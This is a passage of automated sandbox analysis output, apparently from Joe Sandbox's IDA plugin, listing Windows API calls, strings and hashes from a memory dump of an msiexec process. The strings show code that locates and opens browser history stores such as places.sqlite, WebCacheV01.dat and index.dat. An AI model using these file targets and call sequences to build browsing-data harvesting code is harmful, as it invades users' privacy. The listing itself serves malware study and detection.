                                                                                                            • API String ID: 669240632-0
                                                                                                            • Opcode ID: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                            • Instruction ID: 21688b76284891f368be2c5f4feed5723597baa153f24eadc702144372ba9d0b
                                                                                                            • Opcode Fuzzy Hash: 82c8cf326d92d3b179650df20de3df9a559229a48382c0fcbe0adb46b34a8860
                                                                                                            • Instruction Fuzzy Hash: A6F0A472D0022467DF207B65AC46B8A3B6CBF01754F008072F908B71D2EB789A55CFDA
                                                                                                            APIs
                                                                                                            • wcschr.MSVCRT ref: 00414458
                                                                                                            • _snwprintf.MSVCRT ref: 0041447D
                                                                                                            • WritePrivateProfileStringW.KERNEL32(?,?,?,?), ref: 0041449B
                                                                                                            • GetPrivateProfileStringW.KERNEL32(?,?,?,?,?,?), ref: 004144B3
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: PrivateProfileString$Write_snwprintfwcschr
                                                                                                            • String ID: "%s"
                                                                                                            • API String ID: 1343145685-3297466227
                                                                                                            • Opcode ID: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                            • Instruction ID: 05c1b6e2b8d8aed92df8b5d38884bf02313f678dea9e3ece4dcd1a0b753c0483
                                                                                                            • Opcode Fuzzy Hash: 946b4c1fd7f9a1c82d4bd3564eada2d63785a77446bf9af388738d4a416c1506
                                                                                                            • Instruction Fuzzy Hash: 7201AD3240421ABBEF219F81DC09FDB3F6AFF09305F14806ABA08501A1D339C5A5EB58
                                                                                                            APIs
                                                                                                            • GetModuleHandleW.KERNEL32(kernel32.dll,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CB5
                                                                                                            • GetProcAddress.KERNEL32(00000000,GetProcessTimes), ref: 00413CCF
                                                                                                            • GetProcessTimes.KERNELBASE(00000000,?,?,?,?,?,00413EA2,?,?,?,?,?,00000000,?), ref: 00413CF2
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProcProcessTimes
                                                                                                            • String ID: GetProcessTimes$kernel32.dll
                                                                                                            • API String ID: 1714573020-3385500049
                                                                                                            • Opcode ID: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                            • Instruction ID: 0a9fc9a7fb2a98cd878f934f387e3824ef844cc6c25aa3dbb33b58617c33e237
                                                                                                            • Opcode Fuzzy Hash: 3d2a63fc8b7889f90c1cc675bbb66959c3424aca663c91e440c9d47c6094dacc
                                                                                                            • Instruction Fuzzy Hash: F5F03036204309AFEF008FA6FD06B963BA8BB04742F044066FA0CD1561D7B5D6B0EF99
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 004087D6
                                                                                                              • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                                                                              • Part of subcall function 004095D9: memset.MSVCRT ref: 004095FC
                                                                                                            • memset.MSVCRT ref: 00408828
                                                                                                            • memset.MSVCRT ref: 00408840
                                                                                                            • memset.MSVCRT ref: 00408858
                                                                                                            • memset.MSVCRT ref: 00408870
                                                                                                            • memset.MSVCRT ref: 00408888
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset$wcslen$AttributesByteCharFileMultiWidewcscatwcscpy
                                                                                                            • String ID:
                                                                                                            • API String ID: 2911713577-0
                                                                                                            • Opcode ID: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                            • Instruction ID: a7e5ca25de4111a2a05fe91eb9e7b9268c7acadad77a1a504b595fc773a76dc1
                                                                                                            • Opcode Fuzzy Hash: 01acc2a10158501d086df2ecf85720ba35c535a6b148720ad12018c66e71fd5d
                                                                                                            • Instruction Fuzzy Hash: BD5146B280011D7EEB50E751DC46EEF776CDF05318F0040BEB948B6182EA745F948BA9
                                                                                                            APIs
                                                                                                            • memcmp.MSVCRT(?,?,00000004,?,00000065,004381DF,00000065,00000000,00000007,?,00000000), ref: 0041F202
                                                                                                            • memcmp.MSVCRT(?,SQLite format 3,00000010,?,00000065,004381DF,00000065,00000000), ref: 0041F22D
                                                                                                            • memcmp.MSVCRT(?,@ ,00000003,?,?,00000065,004381DF,00000065,00000000), ref: 0041F299
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memcmp
                                                                                                            • String ID: @ $SQLite format 3
                                                                                                            • API String ID: 1475443563-3708268960
                                                                                                            • Opcode ID: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                            • Instruction ID: a5e199d7c3355b23248e204991ed7883f9cb1cefd3641e4a8180bf992d12f390
                                                                                                            • Opcode Fuzzy Hash: 82854fe69cd6f085c01fb16587ca6c24c159481fbb1fdb23c3f30c43337b22d0
                                                                                                            • Instruction Fuzzy Hash: 9051C1719002199BDF10DFA9C4817DEB7F4AF44314F1541AAEC14EB246E778EA8ACB88
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmpqsort
                                                                                                            • String ID: /nosort$/sort
                                                                                                            • API String ID: 1579243037-1578091866
                                                                                                            • Opcode ID: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                            • Instruction ID: 59a4a6edbc2c6816dd96362f3638b70d105e8990563e463c72bda517b6347aa4
                                                                                                            • Opcode Fuzzy Hash: 82532bcf7625f57df0476c9ea77f38d24af0b860564a5aebd85b14b7cf50dee8
                                                                                                            • Instruction Fuzzy Hash: C8213770700201AFD714FB36C880E96F3AAFF58314F11012EE61897692DB39BC918B4A
                                                                                                            APIs
                                                                                                            • memset.MSVCRT ref: 0040E60F
                                                                                                            • memset.MSVCRT ref: 0040E629
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                            Strings
                                                                                                            • Microsoft\Windows\WebCache\WebCacheV24.dat, xrefs: 0040E66F
                                                                                                            • Microsoft\Windows\WebCache\WebCacheV01.dat, xrefs: 0040E647
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcslen$AttributesFilewcscatwcscpy
                                                                                                            • String ID: Microsoft\Windows\WebCache\WebCacheV01.dat$Microsoft\Windows\WebCache\WebCacheV24.dat
                                                                                                            • API String ID: 3354267031-2114579845
                                                                                                            • Opcode ID: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                            • Instruction ID: 2f29c334d396001d9fe1cebc89c879271eb53039ccc8e03d5a3365d75131e7c5
                                                                                                            • Opcode Fuzzy Hash: 74f633d4b8b79b581db03fb52a9a183d925aa75474fb6f674f7548ec87be104c
                                                                                                            • Instruction Fuzzy Hash: 66118AB3D4012C66EB10E755EC85FDB73ACAF14319F1408B7B904F11C2E6B89F984998
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            • only a single result allowed for a SELECT that is part of an expression, xrefs: 0043AAD3
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: only a single result allowed for a SELECT that is part of an expression
                                                                                                            • API String ID: 2221118986-1725073988
                                                                                                            • Opcode ID: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                            • Instruction ID: 0c5fbdb45af1b87466ede92b40025f4dfba1e1eb7e0419b48c64bc8603b8f36f
                                                                                                            • Opcode Fuzzy Hash: f2ccd9f22684a9d505166f2bd917588c88a2d89474e41d8808a21707a3bb0a12
                                                                                                            • Instruction Fuzzy Hash: 5D827A71608340AFD720DF15C881B1BBBE1FF88318F14491EFA9987262D779E954CB96
                                                                                                            APIs
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449E7
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 004449F8
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A09
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A1A
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A2B
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A3C
                                                                                                              • Part of subcall function 004449B9: GetProcAddress.KERNEL32(00000000,00000000), ref: 00444A4D
                                                                                                            • memcmp.MSVCRT(?,0044EC68,00000010,?,00000000,?), ref: 00444BA5
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProc$memcmp
                                                                                                            • String ID: $$8
                                                                                                            • API String ID: 2808797137-435121686
                                                                                                            • Opcode ID: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                            • Instruction ID: 2c4e4273d6b09173b98ec99ba1a72f96ebc6587eba5c15334d9e54441f883a66
                                                                                                            • Opcode Fuzzy Hash: e80885fdbb6a557c0c44277052daa68a3f3074bd67b4db13da85d3ecc8de475b
                                                                                                            • Instruction Fuzzy Hash: 04314171A00209ABEB10DFA6CDC1BAEB7B9FF88314F11055AE515A3241D778ED048B69
                                                                                                            APIs
                                                                                                              • Part of subcall function 0040E01E: OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                                              • Part of subcall function 0040E01E: GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                                              • Part of subcall function 0040E01E: DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                                              • Part of subcall function 0040E01E: GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                                              • Part of subcall function 0040E01E: CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                                              • Part of subcall function 0040E01E: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                                              • Part of subcall function 0040E01E: WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                                              • Part of subcall function 0040E01E: UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                                              • Part of subcall function 0040E01E: CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                                            • CloseHandle.KERNELBASE(000000FF,000000FF,00000000,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E582
                                                                                                              • Part of subcall function 0040E2AB: memset.MSVCRT ref: 0040E380
                                                                                                              • Part of subcall function 0040E2AB: wcschr.MSVCRT ref: 0040E3B8
                                                                                                              • Part of subcall function 0040E2AB: memcpy.MSVCRT(?,-00000121,00000008,0044E518,00000000,00000000,76232EE0), ref: 0040E3EC
                                                                                                            • DeleteFileW.KERNELBASE(?,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5A3
                                                                                                            • CloseHandle.KERNEL32(000000FF,?,0040E6A3,000000FF,?,00000104,00000000), ref: 0040E5CA
                                                                                                              • Part of subcall function 0040E175: memset.MSVCRT ref: 0040E1BD
                                                                                                              • Part of subcall function 0040E175: _snwprintf.MSVCRT ref: 0040E257
                                                                                                              • Part of subcall function 0040E175: free.MSVCRT ref: 0040E28B
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$Handle$Close$ProcessViewmemset$CreateCurrentDeleteDuplicateMappingOpenSizeUnmapWrite_snwprintffreememcpywcschr
                                                                                                            • String ID:
                                                                                                            • API String ID: 1979745280-0
                                                                                                            • Opcode ID: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                            • Instruction ID: 90d235a97b45fa8760f9e747b2c38a4e83ddeae1161d8ec943a7631d31c9d9e7
                                                                                                            • Opcode Fuzzy Hash: 8c4b04af935ef543e183fc2d5fdeec50da417ae7152dfd79b37e36c3b45d6897
                                                                                                            • Instruction Fuzzy Hash: DA312CB1C00618ABCF60DF96CD456CEF7B8AF44318F1006AB9518B31A1DB755E95CF58
                                                                                                            APIs
                                                                                                              • Part of subcall function 00414B81: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 00414BA4
                                                                                                            • memset.MSVCRT ref: 00414C87
                                                                                                            • wcscpy.MSVCRT ref: 00414CFC
                                                                                                              • Part of subcall function 00409CEA: GetVersionExW.KERNEL32(0045D340,0000001A,00414C4F,?,00000000), ref: 00409D04
                                                                                                            Strings
                                                                                                            • Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders, xrefs: 00414CA2, 00414CB2
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressProcVersionmemsetwcscpy
                                                                                                            • String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
                                                                                                            • API String ID: 4182280571-2036018995
                                                                                                            • Opcode ID: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                            • Instruction ID: cfba8ba70a3d5c5eb0df7add68d4968905301debfffe1ddd107e81ced3c7690c
                                                                                                            • Opcode Fuzzy Hash: e6b24c1e526a7e6b175339e46d2c1329f14507f19ad0c7641bd2f64e2867ccb0
                                                                                                            • Instruction Fuzzy Hash: EE110B31802224ABDB24A7999C4E9EF736CDBD1315F2200A7F80562151F6685EC5C6DE
                                                                                                            APIs
                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C09
                                                                                                              • Part of subcall function 00403BED: memset.MSVCRT ref: 00403C1E
                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C47
                                                                                                              • Part of subcall function 00403BED: wcscat.MSVCRT ref: 00403C70
                                                                                                            • memset.MSVCRT ref: 00403A55
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                                              • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memsetwcscatwcslen$free$AttributesFilememcpywcscpy
                                                                                                            • String ID: history.dat$places.sqlite
                                                                                                            • API String ID: 2641622041-467022611
                                                                                                            • Opcode ID: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                            • Instruction ID: 4d52d99a2018a06e8b3479be55870673e402391ac5db5fe9af26a684ed702786
                                                                                                            • Opcode Fuzzy Hash: 9ef9f50687dcf4a121c62199c75cab5672ca0efd30876004e019efa0877f52a8
                                                                                                            • Instruction Fuzzy Hash: CA112EB2A0111866DB10FA66CD4AACE77BCAF54354F1001B7B915B20C2EB3CAF45CA69
                                                                                                            APIs
                                                                                                              • Part of subcall function 00417570: SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A2
                                                                                                              • Part of subcall function 00417570: GetLastError.KERNEL32 ref: 004175A8
                                                                                                            • ReadFile.KERNELBASE(?,?,?,?,00000000), ref: 0041761D
                                                                                                            • GetLastError.KERNEL32 ref: 00417627
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$File$PointerRead
                                                                                                            • String ID:
                                                                                                            • API String ID: 839530781-0
                                                                                                            • Opcode ID: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                            • Instruction ID: c9208e3d43fc8ff2949f7201360c8f82def2114e122364bdeb0a9035ecfb973e
                                                                                                            • Opcode Fuzzy Hash: 35ac1a26cfbf5729ffddcbfd3a0d39ca45c1cff254cac5b3720273d0b32ffa80
                                                                                                            • Instruction Fuzzy Hash: D001A236208204BBEB008F69DC45BDA3B78FB153B4F100427F908C6640E275D89096EA
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileFindFirst
                                                                                                            • String ID: *.*$index.dat
                                                                                                            • API String ID: 1974802433-2863569691
                                                                                                            • Opcode ID: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                            • Instruction ID: 5c3219b8572ff4376619b1de75d6d1d1b7443a793578eadcc31bed7d77429009
                                                                                                            • Opcode Fuzzy Hash: da4ae6558bc3f7d8c9357f2fa5faf2f590160579c2a5e59c58801196d12f8aed
                                                                                                            • Instruction Fuzzy Hash: 0E01257180125895EB20E761DC467DF766C9F04314F5002FB9818F21D6E7389F958F9A
                                                                                                            APIs
                                                                                                            • SetFilePointer.KERNELBASE(?,?,?,00000000), ref: 00417591
                                                                                                            • GetLastError.KERNEL32 ref: 004175A2
                                                                                                            • GetLastError.KERNEL32 ref: 004175A8
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ErrorLast$FilePointer
                                                                                                            • String ID:
                                                                                                            • API String ID: 1156039329-0
                                                                                                            • Opcode ID: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                            • Instruction ID: d6bca62a971eeae6b8c8b5ba9af71e52dcee60bc35e592f51b1cb5e4efccb3e3
                                                                                                            • Opcode Fuzzy Hash: cc1ef3dda130daf7e478d1b1942235eaeedb2679cbd5ead2c00b98c40fc327c6
                                                                                                            • Instruction Fuzzy Hash: 03F03071918115FBCB009B75DC009AA7ABAFB05360B104726E822D7690E730E9409AA8
                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,02000000,00000000,00000000,00000000,004039CA,00000000,?,00000000,?,00000000), ref: 0040A044
                                                                                                            • GetFileTime.KERNEL32(00000000,00000000,00000000,?), ref: 0040A058
                                                                                                            • CloseHandle.KERNELBASE(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,004455D5), ref: 0040A061
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: File$CloseCreateHandleTime
                                                                                                            • String ID:
                                                                                                            • API String ID: 3397143404-0
                                                                                                            • Opcode ID: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                            • Instruction ID: 1a7e7c0172e67e076cb3c0c47f72e507911c66c01d2121fa3096849e88919459
                                                                                                            • Opcode Fuzzy Hash: 6d8e9772f553e0f6d6fb1ff05c82d92c5ca35a40b5ea430072252ef77abff331
                                                                                                            • Instruction Fuzzy Hash: 23E04F3624036077E2311B2BAC0CF4B2E69FBCBB21F150639F565B21E086704915C665
                                                                                                            APIs
                                                                                                            • GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                                            • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                                            • GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Temp$DirectoryFileNamePathWindows
                                                                                                            • String ID:
                                                                                                            • API String ID: 1125800050-0
                                                                                                            • Opcode ID: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                            • Instruction ID: b144c37017a21c6b5a3d1d2b3cfc872714830df517851edcd0bc871ed666fd71
                                                                                                            • Opcode Fuzzy Hash: 18925d4506bf85468b003a70c2eb1ed6509d95f01bdd5ff44bce1f80956a42fa
                                                                                                            • Instruction Fuzzy Hash: ACE0927A500218A7DB109B61DC4DFC777BCFB45304F0001B1B945E2161EB349A848BA8
                                                                                                            APIs
                                                                                                            • Sleep.KERNEL32(00000064), ref: 004175D0
                                                                                                            • CloseHandle.KERNELBASE(?,00000000,?,0045DBC0,00417C24,?,00000000,00000000,?,00417DE1,?,00000000), ref: 004175D9
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CloseHandleSleep
                                                                                                            • String ID: }A
                                                                                                            • API String ID: 252777609-2138825249
                                                                                                            • Opcode ID: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                            • Instruction ID: 75b622f9be81829505acbf4f2e76dfbd2ea822dc2a3448742147a61f3b6dc806
                                                                                                            • Opcode Fuzzy Hash: d8d89497e8f27404fcbaadc135fdc6127e9b1f5305c348180eeea445c8f3bba2
                                                                                                            • Instruction Fuzzy Hash: B7E0CD3B1045156ED500577DDCC099773E9EF892347144226F171C25D0C6759C828524
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID:
                                                                                                            • String ID: d
                                                                                                            • API String ID: 0-2564639436
                                                                                                            • Opcode ID: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                            • Instruction ID: 98c7df9677761670a5e344a1c7628a8b006f0a2246df1cf6f5c5c4488f8f87fd
                                                                                                            • Opcode Fuzzy Hash: 9081757c99ca3a842b21ef208fcf0aba28da60ac56b45099a1a2f4719e1e1e22
                                                                                                            • Instruction Fuzzy Hash: 4591ABB0508302AFDB20DF19D88196FBBE4BF88358F50192FF88497251D778D985CB9A
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: memset
                                                                                                            • String ID: BINARY
                                                                                                            • API String ID: 2221118986-907554435
                                                                                                            • Opcode ID: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                            • Instruction ID: 089a0534c11c2c8a1092ab46fa13594887108ded84822111f9e073e703b485f9
                                                                                                            • Opcode Fuzzy Hash: 791c3fd1504af4fac70d2b15fe323b793bb873d26b5eb9345bfe372344e0595c
                                                                                                            • Instruction Fuzzy Hash: 41518B71A047059FDB21CF69C881BEA7BE4EF48350F14446AF849CB342E738D995CBA9
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000012.00000002.2744281798.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_18_2_400000_msiexec.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: _wcsicmp
                                                                                                            • String ID: /stext
                                                                                                            • API String ID: 2081463915-3817206916
                                                                                                            • Opcode ID: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                            • Instruction ID: 10e6e7fbaeb1b3fbdbf907bfc38f809d5841ace5bac79d7196eddb000c1bc607
                                                                                                            • Opcode Fuzzy Hash: e32263b5b8ee2531379a68aaf94d61f4c2e86babe20e9cb478eb73a56fae033c
                                                                                                            • Instruction Fuzzy Hash: 19218E30B00605AFD704EF6ACAC1AD9F7A9FF44304F10416AA419D7342DB79ADA18B95
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
